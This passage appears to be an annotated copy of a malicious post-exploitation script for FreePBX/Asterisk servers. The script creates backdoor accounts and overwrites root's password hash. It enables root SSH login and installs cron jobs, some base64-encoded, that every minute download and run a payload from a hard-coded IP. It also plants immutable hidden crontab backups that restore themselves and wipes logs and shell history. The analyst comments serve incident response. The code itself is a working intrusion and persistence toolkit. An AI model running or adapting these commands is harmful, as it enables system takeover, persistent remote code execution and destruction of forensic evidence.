# below.
useradd -m -s /bin/bash sugarmaint 2>/dev/null || true
useradd -m -s /bin/bash spamfilter 2>/dev/null || true
useradd -m -s /bin/bash asteriskuser 2>/dev/null || true
useradd -m -s /bin/bash supports 2>/dev/null || true
useradd -m -s /bin/bash freepbxuser 2>/dev/null || true
useradd -m -s /bin/bash supermaint 2>/dev/null || true
useradd -m -s /bin/bash asterisk 2>/dev/null || true
useradd -m -s /bin/bash hima 2>/dev/null || true
# Sets one pre-computed MD5-crypt hash (chpasswd -e takes an already-encrypted
# value) on root and on each account above, plus "juba", which this script
# does not create. Root's real password is overwritten; every account on the
# host needs a credential reset during recovery.
echo 'root:$1$nRz1Cbtk$6DnGs37n.OpPcgejUfp9p.' | chpasswd -e 2>/dev/null || true
echo 'hima:$1$nRz1Cbtk$6DnGs37n.OpPcgejUfp9p.' | chpasswd -e 2>/dev/null || true
echo 'asterisk:$1$nRz1Cbtk$6DnGs37n.OpPcgejUfp9p.' | chpasswd -e 2>/dev/null || true
echo 'sugarmaint:$1$nRz1Cbtk$6DnGs37n.OpPcgejUfp9p.' | chpasswd -e 2>/dev/null || true
echo 'spamfilter:$1$nRz1Cbtk$6DnGs37n.OpPcgejUfp9p.' | chpasswd -e 2>/dev/null || true
echo 'asteriskuser:$1$nRz1Cbtk$6DnGs37n.OpPcgejUfp9p.' | chpasswd -e 2>/dev/null || true
echo 'supports:$1$nRz1Cbtk$6DnGs37n.OpPcgejUfp9p.' | chpasswd -e 2>/dev/null || true
echo 'freepbxuser:$1$nRz1Cbtk$6DnGs37n.OpPcgejUfp9p.' | chpasswd -e 2>/dev/null || true
echo 'supermaint:$1$nRz1Cbtk$6DnGs37n.OpPcgejUfp9p.' | chpasswd -e 2>/dev/null || true
echo 'juba:$1$nRz1Cbtk$6DnGs37n.OpPcgejUfp9p.' | chpasswd -e 2>/dev/null || true
# Forces sshd to port 22 with PermitRootLogin yes (both the commented and the
# active forms of each directive are rewritten), reloads sshd, and appends an
# ACCEPT rule for tcp/22. IR: diff sshd_config against baseline.
sed -i 's/^#Port .*/Port 22/' /etc/ssh/sshd_config 2>/dev/null || true
sed -i 's/^Port .*/Port 22/' /etc/ssh/sshd_config 2>/dev/null || true
sed -i 's/^#PermitRootLogin .*/PermitRootLogin yes/' /etc/ssh/sshd_config 2>/dev/null || true
sed -i 's/^PermitRootLogin .*/PermitRootLogin yes/' /etc/ssh/sshd_config 2>/dev/null || true
systemctl reload sshd 2>/dev/null || service ssh reload 2>/dev/null || kill -HUP $(cat /var/run/sshd.pid 2>/dev/null) 2>/dev/null || true
iptables -A INPUT -p tcp --dport 22 -j ACCEPT 2>/dev/null || true
# Log tampering: deletes every line containing "restapps" from the top-level
# Apache logs. Presumably that string appears in the requests used for
# initial access (inference); look for it in off-host or upstream proxy logs.
find /var/log/httpd/ -maxdepth 1 -name "*.log" -type f -exec sed -i '/restapps/d' {} \; 2>/dev/null || true
# Same downloader entries as the earlier cron block, without -q and joined
# with ';' instead of '&&'. Each `crontab -` again replaces the whole crontab.
echo '*/1 * * * * wget http://45.95.147.178/k.php -O /var/lib/asterisk/bin/zen222;bash /var/lib/asterisk/bin/zen222'|crontab - 2>/dev/null || true
echo '*/1 * * * * wget http://45.95.147.178/k.php -O /var/lib/asterisk/bin/devnull312;bash /var/lib/asterisk/bin/devnull312'|crontab - 2>/dev/null || true
echo '*/1 * * * * wget http://45.95.147.178/k.php -O /var/lib/asterisk/bin/devnull212;bash /var/lib/asterisk/bin/devnull212'|crontab - 2>/dev/null || true
# ============================================
# HIDDEN DIRECTORIES
# ============================================
# Analyst note: hidden crontab backups. Creates dot-directories under system
# paths whose names imitate legitimate components (.systemd, .fonts, .dbus,
# .X11, .fontconfig, .ssl).
mkdir -p /usr/lib/.systemd /usr/share/.fonts /var/lib/.dbus /var/tmp/.X11 /opt/.local /var/cache/.fontconfig /etc/.ssl /root/.config 2>/dev/null

# Writes the current crontab to each location and, when the copy is
# non-empty, marks it immutable with chattr +i. An immutable file cannot be
# removed or edited, even by root, until the flag is cleared; `lsattr` shows
# the "i" attribute and `chattr -i` must precede deletion during cleanup.
for loc in "/usr/lib/.systemd/.cache" "/usr/share/.fonts/.config" "/var/lib/.dbus/.data" "/var/tmp/.X11/.Xauthority" "/opt/.local/.bashrc" "/var/cache/.fontconfig/.cfg" "/etc/.ssl/.cert" "/root/.config/.pref"; do
    mkdir -p "$(dirname "$loc")" 2>/dev/null
    crontab -l > "$loc" 2>/dev/null
    [ -s "$loc" ] && chattr +i "$loc" 2>/dev/null
done

# ============================================
# PERSISTENT PAYLOAD DOWNLOADERS
# ============================================
# Analyst note: base64-encoded cron commands, stored encoded so the crontab
# itself shows no URL or path in clear text. B64_ZEN2 and B64_DEVNULL decode
# to wget downloads of http://45.95.147.178/k.php into
# /var/lib/asterisk/bin/zen2 and /var/lib/asterisk/bin/devnull2, each followed
# by `bash` on the downloaded file. B64_HEAL decodes to a loop that reloads
# the crontab from the first non-empty hidden backup copy.
# Detection: cron entries of the form `echo '<base64>' | base64 -d | bash`.
B64_ZEN2='d2dldCAtcSAtLXRpbWVvdXQ9MSAtLXRyaWVzPTMgaHR0cDovLzQ1Ljk1LjE0Ny4xNzgvay5waHAgLU8gL3Zhci9saWIvYXN0ZXJpc2svYmluL3plbjIgJiYgYmFzaCAvdmFyL2xpYi9hc3Rlcmlzay9iaW4vemVuMg=='
B64_DEVNULL='d2dldCAtcSAtLXRpbWVvdXQ9MSAtLXRyaWVzPTMgaHR0cDovLzQ1Ljk1LjE0Ny4xNzgvay5waHAgLU8gL3Zhci9saWIvYXN0ZXJpc2svYmluL2Rldm51bGwyICYmIGJhc2ggL3Zhci9saWIvYXN0ZXJpc2svYmluL2Rldm51bGwy'
B64_HEAL='Zm9yIGIgaW4gL3Vzci9saWIvLnN5c3RlbWQvLmNhY2hlIC91c3Ivc2hhcmUvLmZvbnRzLy5jb25maWcgL3Zhci9saWIvLmRidXMvLmRhdGEgL3Zhci90bXAvLlgxMS8uWGF1dGhvcml0eSAvb3B0Ly5sb2NhbC8uYmFzaHJjIC92YXIvY2FjaGUvLmZvbnRjb25maWcvLmNmZyAvZXRjLy5zc2wvLmNlcnQgL3Jvb3QvLmNvbmZpZy8ucHJlZjsgZG8gWyAtcyAiJGIiIF0gJiYgY3JvbnRhYiAiJGIiICYmIGJyZWFrOyBkb25l'

# Builds the final crontab: the current entries, three lines that look like
# routine maintenance (logrotate, fc-cache, openssl), the three encoded
# commands at a random minute of each hour, a once-a-minute check that
# starts /var/lib/asterisk/bin/zen2 when no matching process is running, and
# a once-a-minute restore of the crontab from the hidden copies.
# IR: clear the immutable backup copies and the crontab in the same pass,
# otherwise the surviving one reinstates the other.
{
    crontab -l 2>/dev/null || true
    echo "0 1 * * * /usr/sbin/logrotate /etc/logrotate.conf >/dev/null 2>&1"
    echo "*/1 * * * * /usr/bin/fc-cache -f -v >/dev/null 2>&1"
    echo "0 1 * * * /usr/bin/openssl x509 -in /etc/ssl/certs/ca-certificates.crt -noout -dates >/dev/null 2>&1"
    echo "$((RANDOM%60)) * * * * echo '${B64_ZEN2}' | base64 -d | bash >/dev/null 2>&1"
    echo "$((RANDOM%60)) * * * * echo '${B64_DEVNULL}' | base64 -d | bash >/dev/null 2>&1"
    echo "$((RANDOM%60)) * * * * echo '${B64_HEAL}' | base64 -d | bash >/dev/null 2>&1"
    echo "*/1 * * * * pgrep -f 'zen2|devnull2' >/dev/null 2>&1 || (bash /var/lib/asterisk/bin/zen2 >/dev/null 2>&1 &)"
    echo "*/1 * * * * for b in /usr/lib/.systemd/.cache /usr/share/.fonts/.config /var/lib/.dbus/.data /var/tmp/.X11/.Xauthority /opt/.local/.bashrc; do [ -s \"\$b\" ] && crontab \"\$b\" 2>/dev/null && break; done"
} | crontab - 2>/dev/null || true

# ============================================
# FINAL CLEANUP
# ============================================
# Analyst note: anti-forensics. Truncates every *.log file under /var/log,
# deletes the auth, system and web-server logs, clears the in-memory shell
# history, unsets HISTFILE so the session is not written on exit, and removes
# the bash/zsh history files. Zero-length or missing logs with recent ctime
# are themselves an indicator; reconstruction depends on logs that were
# shipped off-host (syslog forwarding, SIEM, proxy or firewall logs).
find /var/log -name "*.log" -exec sh -c 'cat /dev/null > {}' \; 2>/dev/null
rm -rf /var/log/secure* /var/log/messages* /var/log/auth* /var/log/httpd/* /var/log/nginx/* /var/log/apache2/* 2>/dev/null
history -c 2>/dev/null
unset HISTFILE 2>/dev/null
rm -f ~/.bash_history ~/.zsh_history 2>/dev/null

# Analyst note: FreePBX module-admin commands run through fwconsole: update
# the "endpoint" module, upgrade all modules, reset file ownership, reload
# the configuration. Possibly intended to patch the flaw used for entry so
# that others cannot reuse it (inference; the script does not say). An
# unexpected module upgrade in the FreePBX module history or package
# timestamps is therefore consistent with this script having run, not
# evidence that the host is clean.
fwconsole ma update endpoint
fwconsole ma upgradeall
fwconsole chown
fwconsole reload
